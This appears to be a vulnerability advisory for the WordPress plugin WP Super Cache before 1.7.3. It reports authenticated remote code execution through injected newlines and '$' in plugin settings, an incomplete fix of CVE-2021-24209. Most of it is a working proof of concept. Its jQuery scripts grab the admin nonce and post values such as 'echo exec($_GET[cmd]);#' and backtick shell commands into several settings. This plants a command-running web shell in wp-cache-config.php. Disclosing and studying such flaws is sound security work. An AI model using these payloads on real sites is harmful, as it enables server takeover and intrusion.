WP Super Cache < 1.7.3 - Authenticated Remote Code Execution

Description

The parameters $cache_path, $wp_cache_debug_ip, $wp_super_cache_front_page_text, $cache_scheduled_time, $cached_direct_pages used in the plugin settings result in RCE because they allow input of "$" and "\n". This is due to an incomplete fix of CVE-2021-24209.

You can run the command directly to "https://target/wp-content/wp-cache-config.php".

Proof of Concept

//Exploit $cache_path

url = 'http://wp.lab/wordpress/wp-admin/options-general.php?page=wpsupercache&tab=settings';
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_enabled": 1,
      "wp_cache_location": "/tmp/\n$cache_path\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
          "action": "scupdates",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "wp_cache_enabled": 1,
          "wp_cache_location": "./"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $wp_cache_debug_ip, $wp_super_cache_front_page_text

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=debug';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "/tmp/\n$wp_cache_debug_ip\necho exec($_GET[cmd]);#"
      //"wp_super_cache_front_page_text": "/tmp/\n$wp_super_cache_front_page_text\necho exec($_GET[cmd]);#"
  })
  console.log('SET!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "wp_cache_debug": 1,
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "wp_cache_debug_ip": "1"
      //"wp_super_cache_front_page_text": "1"
      })
  });
  console.log('EXPLOIT!');
});


//Exploit $cache_scheduled_time + $cached_direct_pages

url = 'http://[Target]/WordPress/wp-admin/options-general.php?page=wpsupercache&tab=settings';	
jQuery.get(url,function(e){
  jQuery.post(url,{
      "action": "scupdates",
      "wp_cache_enabled": "1",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1]
  })
  console.log('SET1!');
}).then(()=>{

  jQuery.get(url,function(e){
      jQuery.post(url,{
      "action":"expirytime",
      "cache_scheduled_time": "\n`:00",
      "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
      "new_direct_page":"`;echo`$_GET[cmd]`;#"
      })
  }).then(()=>{
    
      console.log('EXPLOIT!');
      jQuery.get(url,function(e){
          jQuery.post(url,{
          "action":"expirytime",
          "cache_scheduled_time": "00:00",
          "_wpnonce": e.match(/_wpnonce\"\svalue=\"(.+?)\"/)[1],
          "new_direct_page":"`;echo`$_GET[cmd]`;#"
          })
      })

  });
  console.log('SET2!');
});